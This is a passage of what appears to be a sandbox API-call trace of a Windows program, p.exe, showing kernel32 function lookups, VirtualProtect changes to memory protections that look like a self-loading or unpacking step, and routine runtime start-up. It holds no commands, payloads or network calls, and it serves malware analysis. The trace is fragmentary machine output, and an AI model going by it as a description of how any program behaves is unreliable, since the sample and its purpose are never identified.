lpProcName="FlushFileBuffers") returned 0x76d4469b [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0052.933] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0052.934] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0052.935] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0052.935] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0052.935] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0052.935] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0052.935] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0052.935] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0052.936] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0052.937] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0052.937] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0052.937] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0052.937] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0052.937] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0052.937] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0052.938] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0052.939] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0052.939] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0052.939] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0052.939] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0052.939] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0052.939] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0052.940] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0052.940] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0052.940] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0052.940] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0052.940] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0052.940] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0052.941] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0052.941] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0052.941] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0052.941] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0052.941] VirtualProtect (in: lpAddress=0x2801000, dwSize=0x1de00, flNewProtect=0x20, lpflOldProtect=0x18f2d8 | out: lpflOldProtect=0x18f2d8*=0x4) returned 1 [0052.941] GetCurrentProcess () returned 0xffffffff [0052.946] VirtualProtect (in: lpAddress=0x281f000, dwSize=0x6000, flNewProtect=0x2, lpflOldProtect=0x18f2d8 | out: lpflOldProtect=0x18f2d8*=0x4) returned 1 [0052.946] GetCurrentProcess () returned 0xffffffff [0052.946] VirtualProtect (in: lpAddress=0x2825000, dwSize=0x2200, flNewProtect=0x4, lpflOldProtect=0x18f2d8 | out: lpflOldProtect=0x18f2d8*=0x4) returned 1 [0052.946] GetCurrentProcess () returned 0xffffffff [0052.947] VirtualProtect (in: lpAddress=0x2828000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x18f2d8 | out: lpflOldProtect=0x18f2d8*=0x4) returned 1 [0052.947] GetCurrentProcess () returned 0xffffffff [0052.947] VirtualFree (lpAddress=0x2829000, dwSize=0x1400, dwFreeType=0x4000) returned 1 [0052.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f318 | out: lpSystemTimeAsFileTime=0x18f318*(dwLowDateTime=0x3205a790, dwHighDateTime=0x1d68245)) [0052.948] GetCurrentThreadId () returned 0xae0 [0052.948] GetCurrentProcessId () returned 0xaec [0052.948] QueryPerformanceCounter (in: lpPerformanceCount=0x18f310 | out: lpPerformanceCount=0x18f310*=17284102175) returned 1 [0052.948] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0052.948] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.948] GetLastError () returned 0x57 [0052.948] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.948] GetLastError () returned 0x57 [0052.948] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0052.948] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0052.948] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.949] GetLastError () returned 0x57 [0052.949] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0052.949] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0052.949] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.949] GetLastError () returned 0x57 [0052.949] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.949] GetLastError () returned 0x57 [0052.949] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0052.949] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0052.950] GetProcessHeap () returned 0xea0000 [0052.950] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.950] GetLastError () returned 0x57 [0052.950] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0052.950] GetLastError () returned 0x57 [0052.950] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0052.950] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0052.950] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x364) returned 0xec39e0 [0052.950] SetLastError (dwErrCode=0x57) [0052.950] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0xe00) returned 0xec3d50 [0052.952] GetStartupInfoW (in: lpStartupInfo=0x18f250 | out: lpStartupInfo=0x18f250*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x2814410, hStdOutput=0x377febfa, hStdError=0xfffffffe)) [0052.952] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0052.952] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0052.952] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0052.952] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" " [0052.953] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" " [0052.953] GetACP () returned 0x4e4 [0052.953] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x220) returned 0xec5b58 [0052.953] IsValidCodePage (CodePage=0x4e4) returned 1 [0052.953] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f270 | out: lpCPInfo=0x18f270) returned 1 [0052.953] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18eb38 | out: lpCPInfo=0x18eb38) returned 1 [0052.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f14c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0052.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f14c, cbMultiByte=256, lpWideCharStr=0x18e8d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0052.953] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18eb4c | out: lpCharType=0x18eb4c) returned 1 [0052.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f14c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0052.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f14c, cbMultiByte=256, lpWideCharStr=0x18e888, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0052.953] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0052.953] GetLastError () returned 0x57 [0052.953] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0052.954] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0052.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e678, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0052.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f04c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ²\\å5\x88ò\x18", lpUsedDefaultChar=0x0) returned 256 [0052.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f14c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0052.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f14c, cbMultiByte=256, lpWideCharStr=0x18e8a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0052.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0052.955] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e698, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0052.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18ef4c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ²\\å5\x88ò\x18", lpUsedDefaultChar=0x0) returned 256 [0052.955] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xec2958 [0052.955] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f094, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p.exe")) returned 0x2b [0052.955] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0052.955] AreFileApisANSI () returned 1 [0052.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0052.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", cchWideChar=-1, lpMultiByteStr=0x2827578, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", lpUsedDefaultChar=0x0) returned 44 [0052.955] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, 